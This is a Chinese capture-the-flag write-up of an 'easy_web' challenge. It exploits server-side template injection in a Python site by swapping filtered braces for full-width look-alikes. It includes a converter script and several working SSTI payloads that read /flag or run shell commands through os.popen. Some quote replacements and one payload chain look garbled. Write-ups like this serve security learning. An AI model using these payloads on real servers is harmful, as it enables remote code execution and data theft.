热门标签
热门文章
- 1大模型部署手记(3)通义千问+Windows GPU_通义千问本地部署 gpu
- 2主机安全加固&终端安全管理_主机安全和终端安全
- 3汇总50个国内外ChatGPT(4.0/3.5)镜像网站【2024年最新】_chatgpt镜像网站
- 4Windows 10 家庭版 安装 docker for Windows( docker desktop) 详细步骤_docker for desktop
- 5知识蒸馏概述及开源项目推荐_知识蒸馏loss
- 6SpringBoot异步切面日志_切面 异步日志
- 7【代码复现】BriVL:人大在Nature上发布的多模态图文认知基础模型
- 8python如何做出图形界面,用python做图形用户界面_python 图形化界面
- 9docker搭建mysql 主从复制_operation create user failed for 'master-slave1'@'
- 10***bpe subword(机器翻译)_bpe codec
当前位置: article > 正文
CTF之easy_web_ctf easy!
作者:IT小白 | 2024-07-10 21:06:44
赞
踩
ctf easy!
打开网站就一个输入框,按理来说这种类型就是注入类型的漏洞了,至于什么注入还不知道
尝试了目录遍历以及漏洞扫描但是没有什么卵用,抓了一下包发现是python,所以考虑一下SSTI注入
但是好像{{}}被过滤了。
通过符号列表进行爆破,发现 / 也被过滤了,但是 ︷ 会被解析成 { ,︸ 会被解析成 }
然后就可以进行SSTI注入了
- """
- { -> ︷/﹛
- } -> ︸/﹜
- ' -> '
- , -> ,
- " -> "
- """
-
-
-
- #str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串
- str='{{().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__['open'](\'/flag\').read()}}'
-
- #︷︷().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__['open']('/flag').read()︸︸
-
-
- str = str.replace('{', '︷')
-
- str = str.replace('}', '︸')
-
- str = str.replace('\'',''' )
-
- str = str.replace('\"', '"')
-
-
-
- print(str)
下面是可以注入的ssti
- ︷︷().__class__.__mro__[1].__subclasses__()[91].__subclasses__()[91].__init__.__globals__.__builtins__['open']('/flag').read()︸︸
-
- ︷︷().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__['open']('/flag').read()︸︸
-
- ︷︷().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat /flag').read()")︸︸
得到flag{8f604f91-c36a-4413-bdaf-e786ffbfda61}
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/IT小白/article/detail/807703
推荐阅读
相关标签
